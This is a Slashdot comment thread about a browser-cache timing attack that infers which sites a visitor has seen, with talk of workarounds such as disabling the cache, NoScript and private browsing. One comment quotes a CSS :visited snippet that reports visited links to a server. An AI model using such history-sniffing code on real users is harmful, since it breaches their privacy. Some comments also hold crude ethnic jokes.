Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

cancel ×

161 comments

Good (-1)

Anonymous Coward | more than 2 years ago | (#38261010)

Good, now they can sniff out my first post

Re:Good (-1)

Anonymous Coward | more than 2 years ago | (#38261092)

Smells like ass. A nose full of rotten eggs with hints of semen and dead animals. 9/10.

Easy work-around (5, Informative)

richkh (534205) | more than 2 years ago | (#38261030)

Fixed cache size of 0.

Re:Easy work-around (5, Insightful)

CastrTroy (595695) | more than 2 years ago | (#38261496)

I do this all the time. My history is disabled by default. Cache is 0. I have never really had a need for history in the past 10 years. If I want to find something again, it's faster to just Google it. Or if I find something that I really don't want to lose, I just bookmark it. No reason to keep a history.

Re:Easy work-around (5, Informative)

icebraining (1313345) | more than 2 years ago | (#38261566)

Cache and history are completely different features. 0 cache means you'll have to download the same CSS/JS/image files over and over again for each page on the same website, which is a waste of resources for both you and the server.

Re:Easy work-around (5, Insightful)

zoloto (586738) | more than 2 years ago | (#38261756)

well, if sites would stop using so much garbage for simple content we wouldn't have this problem now would we?

Re:Easy work-around (3, Informative)

icebraining (1313345) | more than 2 years ago | (#38261838)

There are plenty of cases where actual content - images, videos, etc - benefit from caching. It's not all garbage.

Re:Easy work-around (1)

RandomAvatar (2487198) | more than 2 years ago | (#38262146)

This depends completely on personal preference however. Personally, I don't care if I have to re-download everything on a single page, and if it stops people from breaching privacy and gives them a little kick while it's at it, all the better.

Re:Easy work-around (5, Insightful)

icebraining (1313345) | more than 2 years ago | (#38262306)

You might not care, but the guy paying for the server's bandwidth certainly does ;)

Re:Easy work-around (0, Interesting)

Anonymous Coward | more than 2 years ago | (#38263362)

I pay for my ISP's bandwidth. I have to pay a bill each month. Where is that you can get free ISP access? I pay indirectly for the pages from which I purchase items. Its part of the cost of them doing business.

Of course, if you are suggesting, for example, that the company providing the web page are paying unnecessarily bills because of the size of their web pages they should either improve the content of their web pages or give up on their web presence. The web pages are for the potential customers' benefit and if I find that they are full of flash, secondary advertising or other junk then I do not consider that a benefit. I don't think that I should be using a cache just to make their job easier.

Re:Easy work-around (-1)

Anonymous Coward | more than 2 years ago | (#38261902)

Mod parent +1 naive :(

Re:Easy work-around (4, Interesting)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#38261886)

Completely different features; but not completely different datasets...

If I'm trying to infer where you've been, a nicely formatted(often with handy metadata, timestamps, etc.) history list sure is handy, if I can get access to it; but it's also an obviously juicy target, and something that browser designers are going to try to keep me away from.

Your cache is a lot messier; but it does provide grounds for inference about where you've been(and thus can retrieve from cache in essentially zero time) and where you haven't recently been(and thus have to burn a few tens to hundreds of milliseconds retrieving from a remote host)... Worse, unlike history(which is really just a convenience feature for the user, and can be totally frozen out of any remotely observable aspect of loading a page, those purple links aren't life or death...) the browser cache is an architectural feature that one cannot remove without sacrificing performance, and one cannot even easily obfuscate without sacrificing performance. It's a much lousier dataset than the history, since history is designed to document where you've been but cache only does that partially and incidentally; but it is one that is harder to get rid of without user-visible sacrifices and increases in network load...

Re:Easy work-around (3, Interesting)

icebraining (1313345) | more than 2 years ago | (#38262074)

You wouldn't need to eliminate the cache, just Javascript's ability to measure the load times reliably. For example, you could prevent scripts from reading the state of a particular resource during the e.g. 500 milliseconds after setting its URL, regardless of the source used (cache or network).

Re:Easy work-around (4, Informative)

fuzzyfuzzyfungus (1223518) | more than 2 years ago | (#38262120)

You'd also have to ensure that page elements don't load in any deterministic or controllable order, and that the number of requests the browser has going concurrently isn't predictable: If I can control the order in which your browser loads my page's elements, I can make useful inferences about the load time of a 3rd party resource, without any client javascript, by sandwiching its loading between the loading of two resources(at dynamically generated URLs, to ensure that you couldn't possibly have cached them) on servers I control. Not perfect, because various other factors could affect the time it takes your requests to hit my servers; but likely better than nothing.

It would also be a bit tricky because inferential attacks wouldn't necessarily have to ask politely for the state of the resource they are interested in, they could instead attempt something else(say a script operation that will fail in a particular way unless the 3rd party resource is available). Barring a solution much cleverer than I can think of, you'd be at considerable risk of having to break progressive loading of pages entirely(or at least into human-visible-and-annoying stuttery chunks) in order to keep prevent a combination of a page interrogating its own state on the client, and correlating with timestamps on requests to servers controlled by the attacker...

You would think so... (3, Interesting)

pscottdv (676889) | more than 2 years ago | (#38262404)

But according to how this exploit works they are not "completely different". They, in fact, have a small overlap. Apparently the exploit works by using JavaScript to load a file from a website and see how fast it loads. It infers you have been to a website if the file loads quickly.

They seem to have a trick to stop the process just before the browser puts the loaded file into the cache which prevents it from poisoning the very cache it is "testing".

Thus, setting cache to 0, which the OP recommends, and which I have been doing for years, is exactly the fix needed. I admit that I do not know he also disables history, as that would not help with this exploit.

Re:You would think so... (1)

richkh (534205) | more than 2 years ago | (#38262476)

I'mt the OP. I don't disable history. I don't worry about server load either, because my proxy (I run ipcop on mini-ITX box) does the caching. The server doesn't get bombarded with multiple reloads, and the cache sniffing fails because the files aren't on the machine with the browser.

Re:You would think so... (4, Insightful)

icebraining (1313345) | more than 2 years ago | (#38262520)

The script doesn't actually analyze the cache, just the time it takes to load the resource, so if your proxy's cache is fast enough it might still be detected.

Re:Easy work-around (3, Funny)

Anonymous Coward | more than 2 years ago | (#38263552)

If I want to find something again, it's faster to just Google it. Or if I find something that I really don't want to lose, I just bookmark it. No reason to keep a history.

If your ultimate purpose was more privacy, I find it VERY amusing that you ended up willingly sharing everything with Google, of all parties. :D

Re:Easy work-around (1)

Anonymous Coward | more than 2 years ago | (#38263662)

Yeh. Google it. Because Google doesn't keep tabs on you either?

I don't see the point of disabling cache to keep your history private when its so likely that Google knows it anyway. People are more likely to repeat a past search query than use the bookmark or history features found in browsers. Just for kicks set your resolver for 8.8.8.8 and pretend no one is watching that either.

Pretend your ISP would never do it either.

Pretend that Facebook button on every page in existence is a convenience thing just for you.

The only reason you'd need to sniff my browser cache is because you're sucking at the Internet. Those that don't suck... they have your history already.

Privacy on the Internet is a thing of the past.

Re:Easy work-around (0)

Anonymous Coward | more than 2 years ago | (#38262542)

*grin*

As long as you enable Flash or Silverlight, I can do the same thing without Javascript.
And if I become really obtrusive, I think I can also get your history with pure HTML but that would require much more analysis on my side and is not as accurate as doing it directly. As long as you enable either your javascript/Flash/Silverlight or have a caching enabled, I can see what you've been doing.

But in order not to further scare you, if you turn off javascript, 80% of the connecting adnetworks won't load any ads (and their profiling stuff)
and if you both turn of all you're scripting and caching, I won't be able to profile much besides your visits to sites running within our ad network.

Re:Easy work-around (1)

Freshly Exhumed (105597) | more than 2 years ago | (#38262780)

Yep, but first install a Squid proxy on an internet-facing machine and then set all internal browsers to proxy through it, then set all browsers to use a cache size of 0.

Re:Easy work-around (3, Informative)

Anonymous Coward | more than 2 years ago | (#38262992)

If I correctly understand how this attack works, they could easily read your proxy cache the same way.

Re:Easy work-around (0)

Anonymous Coward | more than 2 years ago | (#38263762)

Fixed cache size of 0.

It seems to be working with cache size set to 0, at least for the current session.

Unreliable (3, Informative)

cpicon92 (1157705) | more than 2 years ago | (#38261048)

This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.

Re:Unreliable (0)

Anonymous Coward | more than 2 years ago | (#38261066)

I'm not sure why anyone cares about this tool - on Firefox, which I don't use at all, it thinks I've visited numerous numerous sites. On Chrome, which I do, it thinks I've visited nothing. So far, I have no reason to believe it's at all accurate.

Re:Unreliable (2, Funny)

Anonymous Coward | more than 2 years ago | (#38261228)

This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.

Most likely an OS/Vendor issue.

If you're using a Mac, pretty much every sniffer tool will show up ghey.

Re:Unreliable (1)

Hentes (2461350) | more than 2 years ago | (#38261306)

Yeah, it's too inaccurate to be convincing. A random algorithm weighted on popularity could have a similar success rate. Maybe if the number of tested sites were increased it would be more clear whether it works or not.

Re:Unreliable (1, Troll)

Ethanol-fueled (1125189) | more than 2 years ago | (#38261542)

I use Firefox with NoScript, instructing the browser to clear everything when it closes. I made a NoScript exception and tried the tool, and it failed to detect anything except Lowe's! I have never visited the Lowe's website, and I have never shopped there*!

* Home Depot is where it's at, especially for cheap Mexicans!

Re:Unreliable (3, Funny)

PopeRatzo (965947) | more than 2 years ago | (#38261824)

Home Depot is where it's at, especially for cheap Mexicans!

That's great news. The Mexicans at Lowe's are really overpriced.

I've got a million of 'em (0, Troll)

PopeRatzo (965947) | more than 2 years ago | (#38261856)

Home Depot is where it's at, especially for cheap Mexicans!

That's great news. The Mexicans at Lowe's are really overpriced.

I just looked at the Home Depot sale paper, and they've got Mexicans on sale. Buy 1, get 18 free.

Not surpisiing (1, Insightful)

Anonymous Coward | more than 2 years ago | (#38261062)

Browser developers are not doing proper development anymore. They are too busy playing stupid games like hiding http://, removing status bars, inflating the version numbers and breaking your extensions to do things like security or proper memory management.

Hard to block this (4, Interesting)

rlk (1089) | more than 2 years ago | (#38261844)

This kind of timing attack isn't easy to block.

Some kinds of timing attacks are. I think I heard once that a timing attack could be made against passwords in TOPS-20, because the passwords were stored in plaintext and compared one character at a time. The trick was to do the system call to check the password (or whatever it was) with the guess split across a page boundary (maybe the second page was forced out of memory or something). Since the system call would return as soon as one character didn't match, it was easy to see if the next character being guessed was correct or not. The fix was simple enough. Obviously there was a bit more to it than that, but I only heard this apocryphally as it was, and at that probably about 25 years ago.

This kind of thing is harder to fix, since it depends upon the difference between cache and non-cache access time, and the non-cached access time is not deterministic. It would be possible for the browser to introduce an artificial delay into the appropriate JavaScript calls, but that would make performance go down the tubes.

In any event, I tried it and the results didn't look very accurate (the first time, all of the sites it tried claimed that I had hit them; the secon time it caimed only one site was in cache, and after that it thought that nothing was).

Re:Hard to block this (0)

Anonymous Coward | more than 2 years ago | (#38263540)

This kind of timing attack isn't easy to block.

Some kinds of timing attacks are. I think I heard once that a timing attack could be made against passwords in TOPS-20, because the passwords were stored in plaintext and compared one character at a time. The trick was to do the system call to check the password (or whatever it was) with the guess split across a page boundary (maybe the second page was forced out of memory or something). Since the system call would return as soon as one character didn't match, it was easy to see if the next character being guessed was correct or not. The fix was simple enough. Obviously there was a bit more to it than that, but I only heard this apocryphally as it was, and at that probably about 25 years ago.

I think in this system the statistics about page faults were available for the application and it could use that information directly in the attack. On the other hand, your way would have probably worked as well.

Javascript required? (5, Informative)

betterunixthanunix (980855) | more than 2 years ago | (#38261094)

This appears to require Javascript. Thank you, noscript.

Re:Javascript required? (5, Insightful)

danbuter (2019760) | more than 2 years ago | (#38261298)

NoScript should just be added in as part of default Firefox. It's very easy to manage, and saves me lots of headaches.

Re:Javascript required? (-1)

Anonymous Coward | more than 2 years ago | (#38261338)

I'm suggesting that my bank and my VOIP provider are unlikely to be either injecting malware onto my machine or sniffing my browsing history through such javascript exploits, while random unknown web sites are more likely to do so.

Are YOU suggesting that all sites on the internet are equally trustworthy in those regards? Ha ha ha oh wow.

And most of the reputable sites that track you do so through 3rd party services like google analytics that you don't have to run to use the main site.

Please, learn a little, *then* come here and argue.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38261362)

Sorry, meant that for a different subthread.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38261426)

You're making the right argument for the wrong reasons.

NoScript is a pain in the ass -- however easy to manage it is, you do have to manage it. And it can cause new headaches if you forget that it's there.

It is, however, almost unquestionably a security benefit, and NoScript does let you trust different sites to different degrees. Your point about Google Analytics is completely self-defeating because it points out a common case where NoScript doesn't hurt at all.

I feel like you're just spouting canned arguments.

Suggest NoScript to implement Whitelist loader (3, Interesting)

Hyperhaplo (575219) | more than 2 years ago | (#38262122)

Perhaps you are both right.

Let's start with the idea that NoScript by default is enabled.

Let's continue with the notion that application management should be as minimal as possible.

I give firewall software as a good example. If it is not easy to do one of the following, then the software (in my opinion, for me) fails:
1) Monitor all software incoming / outgoing. Block anything not on the whitelist, log connections, provide an interface in the *background* for the user to allow or deny in the future as Rules

2) Monitor all software incoming / outgoing. Allow all by default, log all connections, provide an interface for the user to allow or deny in the future as Rules

NoScript does most of this already. What it lacks is a reliable whitelist, similar to that used by Ghostery or AdBlock Plus, which loads the user up with 99% of the Rules they need.

I agree with your comment. For most users, you can whitelist all major bank sites - knowing that 99% of the time the sites are fine.
If the user disagrees then they can modify this setting.
Add onto that list a whole bunch of sites where the root site should be able to be trusted; news sites - slashdot, news.com, guardian, age, newspapers, etc.
Built onto that well known commerical sites.

Make this list auto-update once per month; but not to override user set preferences.

There you go. A tool very similar in nature to Adblock Plus and Ghostery which upon startup has a configuration to protect users and supply 99% of the functionality needed.

If this was the case, then I would put this on lots of people's PCs, knowing that if there are issues then they can be dealt with.

Although, at the moment, Ghostery + AdBlock Plus on Firefox provide most of the protection needed in a usable, safe and coherent manner.

Re:Javascript required? (1)

inzy (1095415) | more than 2 years ago | (#38261400)

...and it confuses the hell out of a lot of people who don't understand what javascript is. "I just want to see the webpage"

Rather than trying to get people using what is frankly an arcane and imprecise tool, we would be better off removing the incentive which makes data theft valuable. This then becomes and economic and social problem rather than technical. there are few situations where the latter can be solved well with the former

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38261748)

That is why I install NoScript on people's computers and then leave it to globally enabled. NoScript provides a lot of protection, even with Javascript allowed. Not ideal, but better than nothing.

Re:Javascript required? (1)

hedwards (940851) | more than 2 years ago | (#38262380)

I ended up replacing it with request policy as half the time I ended up having to enable all the javascript to get the page to load anyways. I mostly just wish it provided a method of blacklisting things like Facebook that never add any value to the site.

Re:Javascript required? (3, Interesting)

bussdriver (620565) | more than 2 years ago | (#38261840)

YES! I 2nd that! But it should be better integrated and off by default -- they can try to hint users into using it by other means. I have NoScript on by default just because I was sick of white listing everything; but any site I feel bad about I blacklist. Its not as secure but it is doing something. Add a subscription list like AdBlock has and it wouldn't be so bad for people who want to help compile black and white lists. Normal users would get a blacklist with it always on by default and others who know better will know enough to flip the policy. The paranoid would turn off the subscription lists and do it all themselves.

I would like a power-user area to block certain DOM features completely. I do not trust canvas by default or most the newer DOM features by default; it should ask me to ok those when a site tries to use them. (the lists mentioned above could specify what is white or black listed not just whole domains etc.) Actually, I'm wary of CSS3 fonts because font render engines haven't been a focus of security and 3D drivers... you are lucky to have stable fast 3D; security? currently a pipe dream.

A DOM js access list by domain would be a lot like a sandbox system for websites.

Re:Javascript required? (3, Informative)

TubeSteak (669689) | more than 2 years ago | (#38261986)

It's very easy to manage

I've installed NoScript for non-technical people and it almost immediately caused them headaches.
There are plenty of internal academic/work websites that rely on fetching scripts from third parties...
Which is exactly what NoScript is designed to prevent.

And then there are endless websites that want you to allow scripts from a CDN or Google APIs or social bookmarking.
NoScript's generic default allows aren't inclusive enough to keep websites from breaking for most people.

Re:Javascript required? (2)

hedwards (940851) | more than 2 years ago | (#38262414)

I've noticed that. When I'm using noscript I tend to spend most of my time enabling things on sites as I often times can't even see the site. I've found that request policy is a lot easier to use in many ways, but unfortunately lacks any sort of black list so you're limited in what you can do as far as blocking portions of a site's javascript collection.

Re:Javascript required? (3, Insightful)

Arker (91948) | more than 2 years ago | (#38262678)

And this wont stop as long as most people are stupid enough to accept browsers that will just run whatever random script some random website hands them. Unfortunately, it's a bit of a chicken and egg problem in that way. If the major browsers would behave sanely, these insanely bad web practices wouldnt work, and the insanely bad 'web designers' that come up with them would have to learn to write real web pages or find another line of work. As is, too many people dont know and dont want to know, and we all pay the price in one way or another.

I'll keep my noscript and be happy that broken pages actually display as broken for me, so I know to avoid them, rather than having my browser just randomly download and execute whatever crap codes the broken web page needs to make it look like something else.

Re:Javascript required? (0)

Anonymous Coward | more than 2 years ago | (#38262224)

NoScript is the conspiracy theory of the crap blockers.
It's essentially pointless, because the big sites all require JavaScript, and those sites are usually the ones where shit like this happens.

The only thing it's effective at, is having a worse browsing experience with less functionality and a slower pace. Or in case you enable JavaScript for big sites: Living in false security

Why don't you also disable pictures... or font rendering... or all graphics for that matter? It would "save you lots of headaches" too, whatever that, in the context of it saving you from nothing, means.

Stupid, stupid, stupid.

Re:Javascript required? (1)

swillden (191260) | more than 2 years ago | (#38261554)

This appears to require Javascript. Thank you, noscript.

It doesn't, really. This proof of concept is implemented using Javascript, because it's easier, but the basic concept doesn't require Javascript to work.

Re:Javascript required? (2)

icebraining (1313345) | more than 2 years ago | (#38261646)

How do you observe download timings without Javascript?

Re:Javascript required? (1)

larry bagina (561269) | more than 2 years ago | (#38262012)

Java (mentioned in the paper) or possibly flash.

Re:Javascript required? (3, Informative)

icebraining (1313345) | more than 2 years ago | (#38262086)

Oh, ok, but NoScript blocks those too, so betterunixthanunix's point still stands.

Re:Javascript required? (2)

swillden (191260) | more than 2 years ago | (#38262584)

Sandwich them between requests to a real server, which you control. Network latency jitter would make the attack less reliable, but I'll bet it would still work reasonably well. Better if you have a low-latency path to the target. ISPs could probably implement it with very high reliability.

Re:Javascript required? (1)

icebraining (1313345) | more than 2 years ago | (#38262716)

How does that work considering that most browsers download resources in parallel (even if they actually load them to the page in order), particularly from different domains?

Re:Javascript required? (1)

godel_56 (1287256) | more than 2 years ago | (#38263700)

This appears to require Javascript. Thank you, noscript.

From the last line in TFA, "If you are using NoScript or other privacy tools, the test will fail even if you whitelist this site."

Thank you, NoScript.

BTW, If you use NoScript, send the author a few bucks. I'll bet very few actually do.

convincing implementation (4, Interesting)

cachimaster (127194) | more than 2 years ago | (#38261098)

The theory isn't new, but a convincing implementation is.

Convincing to who? to you?

ACM [acm.org] was quite convinced back in 2000 when they published the paper.

They obviously implemented it because it contains a lot of measurements.

Re:convincing implementation (1)

osu-neko (2604) | more than 2 years ago | (#38261350)

The theory isn't new, but a convincing implementation is.

Convincing to who? to you?

ACM [acm.org] was quite convinced back in 2000 when they published the paper.

They obviously implemented it because it contains a lot of measurements.

Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.

And obviously, yes, they implemented a method for doing this back in 2000 for that paper. It's what's being referred to when the author notes, "Such attacks were historically regarded as fairly impractical, slow, and noisy - and perhaps more importantly, one-shot." What we have now, though, is a method that is fast, practical, and nondestructive.

Re:convincing implementation (2)

Hentes (2461350) | more than 2 years ago | (#38261546)

Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.

Are you kidding me? The CSS visited link vulnerability took ages to get fixed.

What we have now, though, is a method that is fast, practical, and nondestructive.

It's too inaccurate to be practical. Try it.

but you have to run their software to do it... (0)

Anonymous Coward | more than 2 years ago | (#38261114)

I just tried, and it came up empty: nothing happened when I pushed the button.

I suspect this is YET ANOTHER case where it only works if you voluntarily run their software. And who, any more, is dumb enough to run random javascript from random web sites you don't trust? Whitelist the stuff you want, and leave the rest alone. Would you let random strangers into your house, too? No, you'd let your friends in, and not that drug gang down the street.

So, yeah, amazingly enough, if you run somebody's software on your machine, their software runs on your machine. Trivial fix: don't do that shit.

Re:but you have to run their software to do it... (4, Informative)

lattyware (934246) | more than 2 years ago | (#38261150)

Reality: Only a small number of users use NoScript et al. This is a problem for those that don't, and even if you do, what about when the site you want someone from requires JS?

jacked or tracked: it's your choice (1)

Anonymous Coward | more than 2 years ago | (#38261238)

If it's a reputable site - my bank, my VOIP provider, even the main domain for youtube or something - sure, run the software. But random scripts from weird sites? You have to be a few cards short of a full deck to trust random shit from the internet. It's the damn *internet*. Anyone can do anything on it, so it only takes about three functional neurons to realize that you should use a bit of caution. Even if you don't get jacked, you'll get tracked!

Re:jacked or tracked: it's your choice (0)

lattyware (934246) | more than 2 years ago | (#38261258)

Are you suggesting that your bank, VOIP provider, and youtube have no interest in tracking you?
Ha ha ha oh wow.

Re:jacked or tracked: it's your choice (0)

Anonymous Coward | more than 2 years ago | (#38261354)

(Sorry, got this in the wrong thread before)

'm suggesting that my bank and my VOIP provider are unlikely to be either injecting malware onto my machine or sniffing my browsing history through such javascript exploits, while random unknown web sites are more likely to do so.

Are YOU suggesting that all sites on the internet are equally trustworthy in those regards? Ha ha ha oh wow.

And most of the reputable sites that track you do so through 3rd party services like google analytics that you don't have to run to use the main site.

Please, learn a little, then come back and argue.

Re:jacked or tracked: it's your choice (5, Interesting)

CapOblivious2010 (1731402) | more than 2 years ago | (#38261604)

I've only gotten one internet virus in my life - via the "executable GIF" exploit, from visiting NVIDIA.COM !!!

If you think "reputable" means "safe", YOU'RE a few cards short of a full deck!

Re:jacked or tracked: it's your choice (2, Funny)

icebraining (1313345) | more than 2 years ago | (#38261656)

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind.'

Re:jacked or tracked: it's your choice (1, Offtopic)

uufnord (999299) | more than 2 years ago | (#38261776)

OMG THAT IS SO THOUGHT-PROVOKING!!!11!!111!11

What did he say about unattributed quotes and unreferenced personal pronouns?

Re:jacked or tracked: it's your choice (1)

PNutts (199112) | more than 2 years ago | (#38261972)

A guy I work with has been compromised twice: Once on his work PC visiting Drudge Report. The other was on his home PC while he was... err... never mind. Let's just say he's only been compromised once from a non-adult website and leave it at that.

Re:jacked or tracked: it's your choice (1)

wvmarle (1070040) | more than 2 years ago | (#38262530)

And that is exactly why these scripts are run in a browser, and not directly from your desktop or so.

One of the tasks of a web browser is to provide a script jail, where scripts can run safely, and where they can access resources they need but nothing more. You are downloading stuff from the Internet to display - that's how web browsing works of course. And that is why I want to be able to put trust in my browser that it will do everything it can to prevent these scripts from breaking out of their jail, and from accessing information they have no right to. So far at least Firefox is doing a pretty decent job in that, and I have put my trust in that browser.

Also I'm glad to read about this kind of attacks. I'm not surprised it can be done, there will always be leaks. Though it appears to be rather hard to do, and I hope Mozilla and their competitors will read this too and implement some feature that thwarts this type of attack, keeping the rest of us safe.

Re:but you have to run their software to do it... (0)

Anonymous Coward | more than 2 years ago | (#38261160)

A lot of users still click "Yes" and "Ok" when it shows up.

without javascript (4, Interesting)

Anonymous Coward | more than 2 years ago | (#38261166)

They say it can work without javascript, but I do not believe that. None of the samples work without javascript. In the paper, it says:

We omit the straightforward but tedious details of how to write HTML that causes popular browsers to make serialized accesses to files.

Can anyone provide this tedious, but allegedly straightforward, and extremely critical detail?

Re:without javascript (1)

Anonymous Coward | more than 2 years ago | (#38261282)

HTML is typically rendered in the order that it is read, therefore its possible to know that A is requested before B etc
With that in mind you can sandwich your request to twitter between two dummy requests to a server that you control.
Server compares the timing on the dummy requests and can guess the timing for the real one.

Re:without javascript (2)

Bogtha (906264) | more than 2 years ago | (#38261806)

There's a little more to it than that. Browsers open multiple connections in parallel. Historically, this was limited by the HTTP specification to two simultaneous connections, but recent versions of browsers have increased this limit. You'd have to detect how many simultaneous connections were in use (or hack it by detecting the browser) and make requests to enough tarpits to bog down all but one of the connections. It would probably be fairly reliable, but the work to build that just to demonstrate the flaw in a different way doesn't seem worth it.

There are places where serial access is more well-defined though. Off the top of my head, the only one I can think of is downloading external scripts (because you can't know ahead of time which of them will call document.write(), but they may be thinking of another case that will apply even when scripts aren't being downloaded.

Re:without javascript (1)

Anonymous Coward | more than 2 years ago | (#38261488)

Wow, I was wondering the same thing, then I found this -

http://whattheinternetknowsaboutyou.com/docs/details.html [whattheint...outyou.com]

Skip down to the CSS section:

<style>
        a#link1:visited { background-image: url(/log?link1_was_visited); }
        a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1">
<a href="http://yahoo.com" id="link2">

The background-image is only loaded on the visited state...

Re:without javascript (3, Informative)

Hentes (2461350) | more than 2 years ago | (#38261574)

This is already fixed in most browsers, you need to update/reconfigure yours.

I call shenanigans (1)

gVibe (997166) | more than 2 years ago | (#38261250)

What a load of crap this supposed new tool is. For one...I never go to Facebook, and rarely go to Youtube, and most certainly have never visited Ebay on this machine. I currently use Chrome over most, but have IE and FF installed in case for some reason I need to test a website's browser support. Not sure who the users are that give feedback saying the FF port of the tool for Chrome is working...but I suspect those users wouldn't know their hand from their ass in most cases.

How (5, Informative)

farnsworth (558449) | more than 2 years ago | (#38261314)

This seems to work by loading well-known resources into an iframe and using a heuristic of the "time to load" to tell if it's cached or not. Hence, whether or not you have visited that site. I just scanned the source code, but this is what it looks like. It any case, it's not like this code reveals your history -- just whether or not your browser has visited one in a set of popular sites.

Yay stateless web.

Fix: add a random delay for reporting time to load (1)

bigtrike (904535) | more than 2 years ago | (#38261726)

It seems like you could add a random delay of up to a couple hundred milliseconds before the browser reports that an iframe has successfully loaded, making it harder to tell by the timing.

Re:Fix: add a random delay for reporting time to l (2)

Korin43 (881732) | more than 2 years ago | (#38261754)

Except that would make JavaScript slower, which is the exact opposite of what the browser makers are going for.

Re:Fix: add a random delay for reporting time to l (1)

bigtrike (904535) | more than 2 years ago | (#38261906)

Yes, it definitely would. You could certainly limit the scope to only apply to cross domain queries for out of viewport/small/hidden iframes, but that still might cause slowness issues for legitimate uses.

Re:Fix: add a random delay for reporting time to l (0)

Anonymous Coward | more than 2 years ago | (#38262496)

That's not just that. What about an img tag for example? With JavaScript, you can query the position of the elements below the img (unrelated to the img itself). When they've been pushed down, you know the image has loaded, without actually ever dealing with the particular img tag.

Re:How (1)

mapkinase (958129) | more than 2 years ago | (#38261940)

1/ actually read the article
2/ post cliff notes about it
3/ points

Works like a charm.

Now on topic: I clicked and it shows nothing because of my OCD: Ctrl-Shift-Del, Enter.

Private Browsing mode FTW! (3, Insightful)

pla (258480) | more than 2 years ago | (#38261342)

Subject says it all. I don't worry about cookies, cache, or malicious scripts (other than wastes-of-bandwidth) because every time I open FireFox, it looks shiny and new to the outside world.

When I visit a "sensitive" site, like my bank, I open a new browser session and close it when I finish. Aside from that, I just don't worry about it, and have never had a problem. Hell, even that great data-mining wizard Google - My home page and probably the single most frequent site I hit - Always defaults me to Georgia (presumably the location of my ISP's HQ), missing by over a thousand miles.

Easy enough (4, Interesting)

Baloroth (2370816) | more than 2 years ago | (#38261374)

Tried the test for Opera, and it mostly worked (missed Newegg). Tried it in a private tab, didn't work at all. So, any site you don't want tracking you you load in a private tab. Which you should anyways.

Out of curiosity, I also tried the FF test (in Opera, still) and the IE test. The IE worked, better even than the dedicated test, while the FF test failed utterly. Curious.

And of course, as always, this test only works for the specific sites you test for, not generally. But that isn't surprising. Wasn't terribly fast, either, I'd certainly notice if you tested for hundreds or thousands of sites.

Multiple tests give conflicting results (0)

Anonymous Coward | more than 2 years ago | (#38261430)

By running the test repeatedly Chrome started showing pages I had never visited as being visited.

Re:Multiple tests give conflicting results (3, Informative)

icebraining (1313345) | more than 2 years ago | (#38261630)

That's because the test consists on downloading a file and measuring if it was instantaneous (cached) or not. Of course, the second time you run it, the script itself will have downloaded (and therefore put in cache) the same file, tricking itself.

Re:Multiple tests give conflicting results (1)

xstonedogx (814876) | more than 2 years ago | (#38263710)

It is meant to be non-destructive to the cache.

In all browsers, we can reliably abort the underlying request by changing the src= parameter of the frame as soon as we have a reasonable suspicion we're dealing with a cache miss.

In other words, they don't actually download the files. They request the files to see if the browser starts parsing them within a certain time frame (indicating a cached document). Regardless, they abort the request after that time limit and the document is never cached.

If it did download the files as you suggest, the second and subsequent tests would always give the result that all sites had been visited. The OP and others on the page are reporting different behavior.

I'm seeing occassional transient false positives on Firefox and I'm not really certain how that can be the case.

Assuming the OP is seeing repeated false positives, I would guess he is behind a caching proxy that is caching aborted requests and, after repeated attempts, occassionally getting those documents to the browser faster than the tool can abort the request.

Alt-t, d, enter (3, Interesting)

Anonymous Coward | more than 2 years ago | (#38261476)

It's a dutch boy's thumb, but that quick key-combo clears history in Opera. I just habitually hit it between domains to kill tracking without screwing up sites that need cookies or js to function. Likely there's a Firefox equivalent.

What neither has by default is a way to do this automatically. Browser makers finally got around to letting us limit cookies to the visited site, but they could go much further.

Like just rig browser cache to be per domain -- there's no need for all domains to share the same cache.

Maybe it's the festish for 'fastest' browser? It just seems the makers aren't doing what can be done easily enough on modest modern machines to improve privacy.

A possible fix (2)

Hentes (2461350) | more than 2 years ago | (#38261626)

While this specific implementation is very inaccurate, others using a similar method may work. An obvious workaround to these kind of attacks is to turn off caching, but that would increase loading times. I was wondering if there was a hack in some browser that would allow you to ban a site from using resources from another domain, whether it's by HTML or scripts. Does anyone know such a solution?

Re:A possible fix (1)

Anonymous Coward | more than 2 years ago | (#38262630)

In FireFox the AddOn RequestPolicy does this. (www.requestpolicy.com)

Re:A possible fix (3, Informative)

_0xd0ad (1974778) | more than 2 years ago | (#38262784)

AdBlock Plus lets you do that very easily.

e.g.
Block fsdn.com on third-party sites except slashdot.org
||fsdn.com^$third-party,domain=~slashdot.org
Block fbcdn.com on third-party sites except facebook.com, facebook.net, and fbcdn.net (write similar rules to block the other 3 facebook domains)
||fbcdn.com^$third-party,domain=~facebook.com|~facebook.net|~fbcdn.net

Better have good gag reflexes (5, Funny)

axlr8or (889713) | more than 2 years ago | (#38261842)

Cuz if they wanna sniff my browser history they are in for a surprise.

Browser History Sniffing (-1)

Anonymous Coward | more than 2 years ago | (#38261904)

is the new panty sniffing.

Free Douglas Adams! (tribute novella)
http://thepiratebay.org/torrent/6848623/Perfect_Me_By_Jason_Z._Christie

Java gets such a hard time (1)

ExtremeSupreme (2480708) | more than 2 years ago | (#38261910)

Java is considered such a security hole, and yet they sorted out this problem years ago. Java never could catch a break, geez.

Re:Java gets such a hard time (-1)

Anonymous Coward | more than 2 years ago | (#38263668)

Fat, slow and ugly: no other language took so many resources to run 'hello world' or did it so slowly. Has that improved, or is it still only suitable for behemoth applications *gag* where this startup time is small compared to the rest of the app? Certainly not a suitable environment for a platform built of small, rapidly forked and destroyed tools joined together with pipes like unix. That's nothing to do with the language and everything to do with the ghastly vm.

